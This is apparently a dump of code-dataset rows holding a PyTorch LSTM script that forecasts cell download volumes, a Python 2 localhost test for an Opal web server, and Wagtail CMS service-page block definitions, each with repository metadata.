visual.reward_avg_plot(avg_reward = reward_avg_list)
#Line plot
visual.reward_plot_plot(reward=rewards)
# Dump all collected series to text for offline analysis.
visual.totext(rewards=rewards, avg_reward= reward_avg_list, accidents=accidents_list, out_of_roads=out_of_roads_list, same_lane_emg= ego_emg_same_list,
              emg_reach_end=emg_reach_end_list, steps=steps, speed_violation= speed_violation_list)
| [
"shoaraee@unbc.ca"
] | shoaraee@unbc.ca |
556e2612f70e3c88aa89821db124fb46ae1b0e0a | 232fb54bc7692f9c007b6d589d2bf57e84380d54 | /CNN/TestCode.py | 4d5760f563d21410866dc5050bddc6b2d3ffe90b | [] | no_license | x543586417/Mathorcup2020 | 871157a24bf87baab4f6f34f54f46e5e22786ddf | fa122b1c893414f2a7591af491b5b09fbdd365f2 | refs/heads/master | 2023-02-17T16:59:21.946205 | 2021-01-20T08:29:52 | 2021-01-20T08:29:52 | 329,033,348 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 12,467 | py | import numpy as np
from pandas import DataFrame
from torch import nn
import torch
import matplotlib.pyplot as plt
from torch.autograd import Variable
import pandas as pd
import statsmodels.api as sm
# from date_utils import get_gran, format_timestamp
"""
对上面的package进行整理
numpy是一个张量包
matplotlib.pyplot主要是用来生成图片和列表的
pandas是一个用于数据分析的包
torch.nn是神经网络包
"""
"""
STEP1 怎么表示出相应的预测准确度
STEP2
"""
# Network hyper-parameters.
BATCH_SIZE = 24  # sliding-window length (also the model's default input size)
HIDDEN_SIZE = 128  # LSTM hidden width
# Dataset construction uses a sliding window of BATCH_SIZE values, so the
# rebuilt dataset is len(original) - BATCH_SIZE long; X holds each window
# and Y the known next value the model must learn to predict from X.
def create_dataset(dataset, loop_back=BATCH_SIZE):
    """Turn a series into sliding-window training samples.

    Each X entry holds `loop_back` consecutive values and the matching
    Y entry is the value that immediately follows that run.
    """
    windows = []
    targets = []
    last_start = len(dataset) - loop_back
    for start in range(last_start):
        # The slice end is exclusive, so every window holds exactly
        # `loop_back` values.
        windows.append(dataset[start:(start + loop_back)])
        targets.append(dataset[start + loop_back])
    return np.array(windows), np.array(targets)
loss_train = []  # training loss per epoch, accumulated over all cells
loss_pre = []  # test loss per epoch, accumulated over all cells
x = []
# Load the data: GBK-encoded CSV with per-cell download volumes.
data_csv = pd.read_csv('处理后数据/test3.csv', encoding='gbk')
# Train and evaluate one model per cell id.
for i in data_csv['Cell_num'].unique():
    data = np.array(data_csv[data_csv['Cell_num'] == i]['Download'])
    # (disabled) alternative: split the series at day 31 and min-max
    # normalise the two halves separately:
    # a = data_csv[data_csv['Cell_num'] == i]
    # a = a[a['Day'] <= 31]
    # data1 = np.array(a['Download'])
    # a = data_csv[data_csv['Cell_num'] == i]
    # a = a[a['Day'] > 31]
    # data2 = np.array(a['Download'])
    # max_value_3 = np.max(data1)
    # min_value_3 = np.min(data1)
    # max_value_4 = np.max(data2)
    # min_value_4 = np.min(data2)
    # data1 = list(map(lambda x: (x - min_value_3) / (max_value_3 - min_value_3), data1))
    # data2 = list(map(lambda x: (x - min_value_4) / (max_value_4 - min_value_4), data2))
    # data = data1 + data2
    # data preprocessing (drop invalid samples):
    # dataset = data.astype('float32')
    # data_csv2 = dataset[1:, np.newaxis]
    # print(type(dataset))
    # Normalisation: earlier runs scaled to [0, 1]; now trying wider ranges.
    max_value = np.max(data)
    min_value = np.min(data)
    mu = np.mean(data, axis=0)
    std = np.std(data, axis=0)
    scalar = max_value - min_value
    # divide-by-max normalisation:
    # dataset = list(map(lambda x : x / scalar, data_csv2)) # normalisation
    # MinMaxScaler-style normalisation:
    # data = list(map(lambda x: (x - min_value) / (max_value - min_value), data))
    # mean/std (z-score) normalisation -- the variant actually used:
    data = list(map(lambda x: (x - mu) / std, data))
    # scale into a fixed range, [0-10]:
    # dataset = list(map(lambda x: x / scalar * 10, data))
    # Build the (input, target) pairs.
    # Per the author: data_X/data_Y sizes were e.g. (142,2,1)/(142,1);
    # the first axis is the sample count, the rest are rows/columns.
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    data_X, data_Y = create_dataset(data)
    # Build the training and test sets.
    # Split by slicing: the first part trains, the remainder tests.
    # Train Y is fed to the model for fitting; test Y only checks accuracy.
    # The datasets here are 3-D arrays.
    # The first three go into the network; the last one is for validation.
    train_size = int(len(data_X) * 42 / 49)
    train_X = data_X[:train_size]
    train_Y = data_Y[:train_size]
    test_X = data_X[train_size:]
    test_Y = data_Y[train_size:]
    # Reshape to the layout the LSTM model expects (format unification).
    # Per the author, example shapes after reshaping:
    # train_X: 99,1,2
    # train_Y: 99,1
    # test_X: 43,1,2
    train_X = train_X.reshape(-1, 1, BATCH_SIZE) # -1 lets reshape infer this axis from the others
    train_Y = train_Y.reshape(-1, 1, 1)
    test_X = test_X.reshape(-1, 1, BATCH_SIZE)
    test_Y = test_Y.reshape(-1, 1, 1)
    # Convert from numpy arrays to torch tensors.
    # (To use the GPU this conversion could happen earlier, on the raw data.)
    # torch.tensor would also work here.
    # Author-noted sizes: train_x 99,1,2; train_y 99,1,1; test_x 43,1,2.
    train_x = torch.Tensor(train_X)
    # print(train_x.shape)
    train_y = torch.Tensor(train_Y)
    # print(train_y.shape)
    test_x = torch.Tensor(test_X)
    test_y = torch.Tensor(test_Y)
    # Build the LSTM model.
    class lstm(nn.Module):
        """
        Model for this task: a Conv1d front end, two stacked LSTM stages
        and a small fully connected head. The default sizes come from the
        module-level BATCH_SIZE/HIDDEN_SIZE constants, and the input
        tensors must be reshaped to match them (see the reshape calls
        above).
        """
        def __init__(self, input_size=BATCH_SIZE, hidden_size=HIDDEN_SIZE,
                     output_size=1, num_layer=2):
            super(lstm, self).__init__()
            # Author's shape notes (for input_size=2, hidden=4, 2 layers,
            # output 1) -- the first axis is the sample count and does not
            # have to match the LSTM sizes, the remaining axes must:
            # train_X: 99,1,2
            # train_Y: 99,1
            # test_X: 43,1,2
            self.layer0 = nn.Sequential(
                nn.Conv1d(1, 24, kernel_size=2, padding=1),
                nn.ReLU(True)
            )
            self.layer1 = nn.LSTM(input_size, hidden_size, num_layer, dropout=0.5) # first LSTM stage
            self.layer2 = nn.LSTM(hidden_size, hidden_size * 2, num_layer, dropout=0.5) # second, wider LSTM stage
            self.layer3 = nn.Sequential(
                nn.Linear(hidden_size * 2, hidden_size),
                nn.Tanh(),
                nn.Linear(hidden_size, output_size), # linear head -> output_size values
            )
        # Forward pass; note the reshapes needed to feed the linear head.
        def forward(self, x):
            x = self.layer0(x)
            x, _ = self.layer1(x) # discard the (h_n, c_n) state
            x, _ = self.layer2(x)
            s, b, h = x.size() # h is hidden_size * 2 after layer2
            x = x.view(s * b, h) # flatten so the Linear layers see 2-D input
            # print(x.shape)
            x = self.layer3(x) # head maps hidden_size*2 -> output_size
            # print(x.shape)
            x = x.view(s, b, -1) # restore the 3-D layout to match train_Y
            # print(x.shape)
            return x
    # TODO CUDA
    # model = lstm(BATCH_SIZE, 8, 1, 2)
    model = lstm(BATCH_SIZE, HIDDEN_SIZE, 1, 2).to(device) # window-sized input, 1 output value, 2 stacked layers
    # Build the loss function and the optimiser.
    # TODO CUDA
    # criterion = nn.MSELoss()
    criterion = nn.MSELoss().to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
    # torch.optim.lr_scheduler.CosineAnnealingLR()
    # var_x = torch.tensor(train_x, dtype=torch.float32, device=device)
    # var_y = torch.tensor(train_y, dtype=torch.float32, device=device)
    # TODO CUDA
    var_x = Variable(train_x).to(device)
    # var_x = var_x
    var_y = Variable(train_y).to(device)
    # var_y = var_y
    # Model training.
    for e in range(100):
        # var_x/var_y keep the same layout as train_x/train_y.
        # forward pass
        out = model(var_x) # model prediction for the training windows
        loss = criterion(out, var_y) # MSE between prediction and target
        loss_train.append(float(loss.data))
        # Track the test loss every epoch as well.
        var_test_x = Variable(test_x).to(device)
        var_test_y = Variable(test_y).to(device)
        pred_test = model(var_test_x).to(device)
        loss1 = criterion(pred_test, var_test_y)
        loss_pre.append(float(loss1.data))
        # backward pass and optimiser step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        if (e + 1) % 100 == 0: # report every 100 epochs
            print('Epoch: {}, Loss: {:.7f}'.format(e + 1, loss.data))
            print('Loss: {:.7f}'.format(loss1.data))
    # torch.save(model.state_dict(), 'I:\\file\\newpytorch\\net.pth')
    # torch.save(model.state_dict(), 'I:\\file\\newpytorch\\net3435.pth')
    # torch.save(model.state_dict(), 'I:\\file\\newpytorch\\net3536.pth')
    # torch.save(model.state_dict(), 'net318319.pth')
    torch.save(model.state_dict(), 'net408-2.pth')
    # Author note: some results still look off, especially the accuracy part.
    print("save!")
    ## Experiment log (translated):
    ## net: first training run.
    ## net3435: results of the 3/4-3/5 tuning run.
    ## net baseline: BATCH_SIZE 288 (24h), single Linear head.
    ## 3435 change: BATCH_SIZE 12 (1h), double Linear head.
    ## 3536 change: BATCH_SIZE 72 (6h), trying six hours.
    ## 3637 change: BATCH_SIZE 144 (12h), last batch-size test; the LSTM itself is next.
    ## 318319 change: BATCH_SIZE still 144, HIDDEN_SIZE=32.
    # TODO CUDA
    model1 = lstm().to(device)
    # model1.load_state_dict(torch.load('I:\\file\\newpytorch\\net.pth'))
    # model1.load_state_dict(torch.load('I:\\file\\newpytorch\\net3435.pth'))
    # model1.load_state_dict(torch.load('I:\\file\\newpytorch\\net3536.pth'))
    model1.load_state_dict(torch.load('net408-2.pth'))
    model1.eval()
    print('load successfully!')
    # Model prediction.
    # (author: unclear whether switching the model object to eval mode
    # suffices; revisit this part)
    # model = model.eval()
    # model = model.eval().to(device) # switch to evaluation mode
    # Feed test_x through the reloaded model to get predictions.
    # TODO CUDA
    var_test_x = Variable(test_x).to(device)
    var_test_y = Variable(test_y).to(device)
    # var_test_x = Variable(test_x)
    # var_test_y = Variable(test_y)
    # data_X = data_X.reshape(-1, 1, BATCH_SIZE)
    # data_X = torch.Tensor(data_X)
    # var_data = Variable(data_X) # a Variable is a wrapper around a tensor (with default settings)
    # # Variables speed up backward error propagation compared to plain tensors
    # TODO CUDA
    pred_test = model1(var_test_x).to(device) # predictions on the test set
    # # convert the output from Variable to numpy/tensor form:
    # pred_test = pred_test.view(-1).data.numpy()
    pred_test = model1(var_test_x).to(device)
    loss1 = criterion(pred_test, var_test_y)
    print(var_test_y.size())
    print(len(var_test_y))
    print('Loss: {:.7f}'.format(loss1.data))
    # Count predictions within 5% relative error of the target.
    running_correct = 0
    # wucha = float(20) / scalar
    for i in range(var_test_y.size(0)):
        if (abs((pred_test[i] - var_test_y[i]) / var_test_y[i]) < 0.05):
            running_correct += 1
    print(running_correct)
    # Plot the real values against the predictions.
    # plt.title('Result Analysis')
    pred_T_t = pred_test[:, 0]
    pred_N = pred_T_t.data.cpu().numpy()
    # Undo the z-score normalisation before plotting.
    pred_N = pred_N * std + mu
    var_test_y_T = var_test_y[:, 0]
    var_test_y_N = var_test_y_T.data.cpu().numpy()
    var_test_y_N = var_test_y_N * std + mu
    plt.plot(var_test_y_N, 'r', label='real')
    plt.plot(pred_N, 'b', label='pred')
    plt.savefig("test.png", dpi=300)
    plt.xlabel('number')
    plt.ylabel('value')
    plt.show()
    # Training-loss curve (the Chinese file names mean "training set loss").
    plt.plot(loss_train, 'r', label='train_loss')
    plt.xlabel('Loss')
    plt.xlabel('Step')
    plt.show()
    plt.savefig("训练集Loss.png", dpi=300)
    lt = DataFrame(loss_train)
    lt.to_csv("训练集Loss.csv", index=False)
    # Test-loss curve (the Chinese file names mean "test set loss").
    plt.plot(loss_pre, 'r', label='pre_loss')
    plt.xlabel('Loss')
    plt.xlabel('Step')
    plt.show()
    plt.savefig("测试集Loss.png", dpi=300)
    l_pre = DataFrame(loss_pre)
    l_pre.to_csv("测试集Loss.csv", index=False)
    # plt.legend(loc='best')
    # plt.plot(pred_y, 'r', label='pred')
    # (alpha controls the line transparency in plot)
    # plt.plot(data_y, 'b', label='real', alpha=0.3)
    # plt.plot([train_size, train_size], [-1, 2], color='k', label='train | pred')
    # plt.legend(loc='best')
    # plt.savefig('lstm_reg.png')
    # plt.pause(4)
| [
"xiaoweliang@qq.com"
] | xiaoweliang@qq.com |
d2333889ef1fc70d5e7c0a79e6f3112aa752306a | 6fc84acaaf012f6cbbcb918390a4ed5508f84414 | /opalWebsrv/test.py | 5f5f02fee393637efbf17662b5ee5d476b2f476d | [] | no_license | missinglpf/MAS_finite_consenus | 43f03bdb2417c6da98cb5ff5a6b8b888ec1944b3 | a83e8709dd12e5965ef4a5b413d056a434dd1245 | refs/heads/master | 2020-08-01T03:42:44.747402 | 2018-06-25T06:01:10 | 2018-06-25T06:01:10 | 210,850,495 | 3 | 0 | null | 2019-09-25T13:20:32 | 2019-09-25T13:20:32 | null | UTF-8 | Python | false | false | 2,298 | py | #! /usr/bin/python
import struct
import socket
import urllib
import subprocess
import sys
import time
import os
import traceback
def portIsOpened(hostip, port):
    """Return True if a TCP connection to (hostip, port) succeeds.

    connect_ex() returns 0 on success and an errno value otherwise,
    so the result reduces to a single comparison.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # FIX: the socket was never closed, leaking a file descriptor
        # (and a live connection on success) every call.
        return sock.connect_ex((hostip, port)) == 0
    finally:
        sock.close()
def fakeOpalCom(vals, the_format_in, the_format_out, hostip, port):
    # Emulate one request/response exchange of the Opal UDP protocol:
    # pack `vals` with struct format `the_format_out`, send the datagram to
    # (hostip, port), block for a single reply, and unpack it with
    # `the_format_in`.  Returns the unpacked reply as a tuple.
    sock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    d4= struct.pack(the_format_out, *vals)
    sent=sock.sendto(d4, (hostip, port))
    print "Opal sends", vals
    # NOTE(review): recvfrom() blocks forever if the server never answers —
    # presumably acceptable for a manual test script; confirm no timeout is
    # wanted here.
    rawdata,server=sock.recvfrom(4096)
    sock.close()
    data = struct.unpack(the_format_in, rawdata)
    print "Opal recvd", data
    return data
def testsrv(http_port, opal_port, nbIn, nbOut):
    # End-to-end test: launch opalWebSrv.py in simulation mode (-s) with the
    # given input/output vector sizes, then exercise both of its interfaces:
    #   * the Opal UDP side, via fakeOpalCom()
    #   * the HTTP side, via urllib (asyncsrv/set and asyncsrv/get)
    # The server subprocess is killed on any failure and the error re-raised.
    #
    # NOTE(review): http_port and opal_port are accepted but ignored — the
    # body hard-codes 8000/50000 below, which evidently match the server's
    # defaults.  The second entry in params_list therefore only varies
    # nbIn/nbOut.  Fixing this would require passing the ports to the
    # subprocess too.
    print "Testing with a new set"
    # Both ports must be free before the server is started.
    assert(not(portIsOpened('127.0.0.1',http_port)))
    assert(not(portIsOpened('127.0.0.1',opal_port)))
    p = subprocess.Popen([os.getcwd()+ "/opalWebSrv.py", "-s", "-I", str(nbIn), "-O", str(nbOut)], bufsize=1024, stdin=sys.stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    try:
        time.sleep(0.5)  # give the server time to bind its sockets
        # Wire format: little-endian header (short, int, short) followed by
        # nbIn (replies) or nbOut (requests) doubles.
        the_format_in='<hih'+str(nbIn)+'d'
        the_format_out='<hih'+str(nbOut)+'d'
        HTTP_PORT=str(8000)
        UDP_IP='127.0.0.1'
        UDP_PORT=50000
        # First exchange: no values set over HTTP yet, expect all-zero inputs.
        vals=[1,2,3]+range(1,nbOut+1)
        opalret = fakeOpalCom(vals, the_format_in, the_format_out, UDP_IP, UDP_PORT)
        assert(opalret==tuple([1,0,8*nbIn]+[0 for i in range(nbIn)]))
        # Set two input values over HTTP, then read back the outputs the
        # previous UDP exchange delivered.
        f=urllib.urlopen('http://localhost:'+HTTP_PORT+'/asyncsrv/set?valin0=12.5&valin1=40.2')
        print f.read()
        f=urllib.urlopen('http://localhost:'+HTTP_PORT+'/asyncsrv/get?name0=valout0&name1=valout1')
        ret=f.read()
        print ret
        assert(ret=='{"valout0": 1.0, "valout1": 2.0}')
        # Second exchange: the HTTP-set values must now appear in the reply.
        vals=[1,2,3,10.]+range(2,nbOut+1)
        opalret = fakeOpalCom(vals, the_format_in, the_format_out, UDP_IP, UDP_PORT)
        assert(opalret==tuple([1,1,8*nbIn]+[12.5,40.2]+ [0 for i in range(nbIn-2)]))
        f=urllib.urlopen('http://localhost:'+HTTP_PORT+'/asyncsrv/get?name0=valout0&name1=valout1')
        assert(f.read()=='{"valout0": 10.0, "valout1": 2.0}')
    except Exception as error:
        # Never let the server subprocess outlive a failing test.
        p.kill()
        traceback.print_exc()
        raise(error)
    p.kill()
# Run the end-to-end test with each parameter set in turn.
# NOTE(review): testsrv() currently ignores http_port/opal_port (it always
# talks to 8000/50000), so the second entry only exercises nbIn/nbOut.
params_list = [
    {"http_port": 8000, "opal_port": 50000,"nbIn":16, "nbOut":16},
    {"http_port": 8001, "opal_port": 50001,"nbIn":10, "nbOut":12}
]
for params in params_list:
    testsrv(**params)
print "Testing succeeded"
| [
"tunglam87@gmail.com"
] | tunglam87@gmail.com |
43dcac20edd103067c8fa3fce010b8162d077b2a | 552ba370742e346dbb1cf7c7bf4b99648a17979b | /tbx/services/blocks.py | cbd8282834c2d89bfbac3f75334fcd64d1e9a9a5 | [
"MIT"
] | permissive | arush15june/wagtail-torchbox | 73e5cdae81b524bd1ee9c563cdc8a7b5315a809e | c4d06e096c72bd8007975dc016133024f9d27fab | refs/heads/master | 2022-12-25T05:39:32.309635 | 2020-08-13T14:50:42 | 2020-08-13T14:50:42 | 299,591,277 | 0 | 0 | MIT | 2020-09-29T11:08:49 | 2020-09-29T11:08:48 | null | UTF-8 | Python | false | false | 3,242 | py | from wagtail.core.blocks import (CharBlock, ListBlock, PageChooserBlock,
RichTextBlock, StreamBlock, StructBlock,
TextBlock, URLBlock)
from wagtail.images.blocks import ImageChooserBlock
from tbx.core.blocks import PullQuoteBlock
class CaseStudyBlock(StructBlock):
    """StreamField block: a titled intro plus a list of featured case studies.

    Each case-study entry points at a ``work.WorkPage`` and may optionally
    override its title, descriptive title, and image.
    """
    title = CharBlock(required=True)
    intro = TextBlock(required=True)
    case_studies = ListBlock(StructBlock([
        ('page', PageChooserBlock('work.WorkPage')),
        ('title', CharBlock(required=False)),
        ('descriptive_title', CharBlock(required=False)),
        ('image', ImageChooserBlock(required=False)),
    ]))

    class Meta:
        template = 'blocks/services/case_study_block.html'
class HighlightBlock(StructBlock):
    """StreamField block: a title, an optional rich-text intro, and a list
    of free-text highlight items."""
    title = CharBlock(required=True)
    intro = RichTextBlock(required=False)
    highlights = ListBlock(TextBlock())

    class Meta:
        template = 'blocks/services/highlight_block.html'
class StepByStepBlock(StructBlock):
    """StreamField block: an ordered list of process steps.

    Each step carries an optional subtitle, a title, raw SVG markup for its
    icon (stored in a CharBlock — editors paste SVG source directly), and a
    rich-text description.
    """
    title = CharBlock(required=True)
    intro = TextBlock(required=False)
    steps = ListBlock(StructBlock([
        ('subtitle', CharBlock(required=False)),
        ('title', CharBlock(required=True)),
        # max_length is generous because the value is inline SVG source.
        ('icon', CharBlock(max_length=9000, required=True, help_text='Paste SVG code here')),
        ('description', RichTextBlock(required=True))
    ]))

    class Meta:
        template = 'blocks/services/step_by_step_block.html'
class PeopleBlock(StructBlock):
    """StreamField block: a titled, rich-text-introduced list of people,
    each chosen as a page (no page-type restriction is declared here)."""
    title = CharBlock(required=True)
    intro = RichTextBlock(required=True)
    people = ListBlock(PageChooserBlock())

    class Meta:
        template = 'blocks/services/people_block.html'
class FeaturedPagesBlock(StructBlock):
    """StreamField block: a titled list of featured pages, each with an
    image, a blurb, and a short (max 100 chars) sub-text line."""
    title = CharBlock()
    pages = ListBlock(StructBlock([
        ('page', PageChooserBlock()),
        ('image', ImageChooserBlock()),
        ('text', TextBlock()),
        ('sub_text', CharBlock(max_length=100)),
    ]))

    class Meta:
        template = 'blocks/services/featured_pages_block.html'
class SignUpFormPageBlock(StructBlock):
    """StreamField block that embeds a ``sign_up_form.SignUpFormPage`` and
    exposes an unbound instance of that page's sign-up form to the template."""
    page = PageChooserBlock('sign_up_form.SignUpFormPage')

    def get_context(self, value, parent_context=None):
        """Extend the default block context with ``form``, a fresh instance
        of the chosen page's ``sign_up_form_class``."""
        # Zero-argument super() — the file imports wagtail.core (Wagtail 2.x),
        # which is Python 3 only, so the old two-argument form is redundant.
        context = super().get_context(value, parent_context)
        context['form'] = value['page'].sign_up_form_class()
        return context

    class Meta:
        icon = 'doc-full'
        template = 'blocks/services/sign_up_form_page_block.html'
class LogosBlock(StructBlock):
    """StreamField block: a titled set of client logos, each optionally
    linking to an internal page or an external URL."""
    title = CharBlock()
    intro = CharBlock()
    # Consistency: use the list-of-lists style for StructBlock child
    # definitions, matching every other block in this module (this was the
    # only one written as a tuple of tuples).
    logos = ListBlock(StructBlock([
        ('image', ImageChooserBlock()),
        ('link_page', PageChooserBlock(required=False)),
        ('link_external', URLBlock(required=False)),
    ]))

    class Meta:
        icon = 'site'
        template = 'blocks/services/logos_block.html'
class ServicePageBlock(StreamBlock):
    """Top-level StreamField definition for service pages.

    Aggregates every block type a service page may contain.  PullQuoteBlock
    is shared with ``tbx.core`` but rendered here with a service-specific
    template override.
    """
    paragraph = RichTextBlock(icon="pilcrow")
    case_studies = CaseStudyBlock()
    highlights = HighlightBlock()
    pull_quote = PullQuoteBlock(template='blocks/services/pull_quote_block.html')
    process = StepByStepBlock()
    people = PeopleBlock()
    featured_pages = FeaturedPagesBlock()
    sign_up_form_page = SignUpFormPageBlock()
    logos = LogosBlock()
| [
"karl@torchbox.com"
] | karl@torchbox.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.